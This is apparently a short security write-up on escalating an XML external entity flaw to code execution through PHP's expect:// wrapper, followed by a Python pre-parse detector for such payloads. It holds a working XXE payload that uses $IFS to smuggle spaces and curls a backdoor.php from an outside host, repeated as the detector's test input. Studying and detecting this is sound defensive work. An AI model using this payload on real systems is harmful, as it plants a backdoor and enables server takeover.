From XXE to RCE with PHP/expect — The Missing Link

DOMDocument::loadXML(): Invalid URI: expect://echo BLAH in Entity, line: 2

What I Found

" - double quotes
{ } - curly braces
| - "pipe"
\ - backslash
< > - angle brackets
: - colon
' - single quote
; - semicolon
( ) - round brackets (parentheses)
$ - dollar sign

Making It Work

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'1.3.3.7:8000/backdoor.php'">
]>
<root>
<name>Joe</name>
<tel>ufgh</tel>
<email>START_&file;_END</email>
<password>kjh</password>
</root>
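As an added example (not code from the original post), here is a defender-side pre-parse gate that inspects untrusted XML before it reaches DOMDocument or any other parser. It flags the three building blocks of the chain above: an inline DOCTYPE, an external entity declaration, and a PHP stream wrapper such as expect:// (including the $IFS trick used to smuggle a space past the URI check). The wrapper list and the benign sample document are my assumptions.

```python
import re

# Stream wrappers that turn entity resolution into something other than a plain
# file read. The set is an assumption; extend it to match your PHP build.
RISKY_WRAPPERS = ("expect", "php", "data", "glob", "phar", "compress.zlib")

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Matches general and parameter (%) entities pointing at SYSTEM or PUBLIC URIs.
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+%?\s*(\w+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"',
    re.IGNORECASE,
)
# $IFS (or ${IFS}) is the shell's field separator; in an expect:// URI it
# stands in for the space that the URI validator rejects.
IFS_RE = re.compile(r"\$\{?IFS\}?")


def analyze_xml(doc: str) -> dict:
    """Return {'block': bool, 'reasons': [...]}; no reasons means nothing suspicious."""
    reasons = []
    if DOCTYPE_RE.search(doc):
        reasons.append("doctype")  # a client-supplied DTD is rarely legitimate
    for name, uri in EXTERNAL_ENTITY_RE.findall(doc):
        reasons.append(f"external-entity:{name}")
        scheme = uri.split("://", 1)[0].lower() if "://" in uri else ""
        if scheme in RISKY_WRAPPERS:
            reasons.append(f"wrapper:{scheme}")
        if IFS_RE.search(uri):
            reasons.append("ifs-space-smuggling")
    return {"block": bool(reasons), "reasons": reasons}


# The payload from the post, reproduced here as the positive test input.
PAGE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'1.3.3.7:8000/backdoor.php'">
]>
<root><email>START_&file;_END</email></root>"""

# Constructed benign document of the same shape, used as the negative input.
BENIGN_DOC = '<?xml version="1.0"?><root><name>Joe</name><tel>ufgh</tel></root>'

if __name__ == "__main__":
    print(analyze_xml(PAGE_PAYLOAD))
    print(analyze_xml(BENIGN_DOC))
```

Run this gate before parsing and reject on `block`; even when libxml's entity loader is disabled, a DOCTYPE from a client is a strong signal worth logging.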
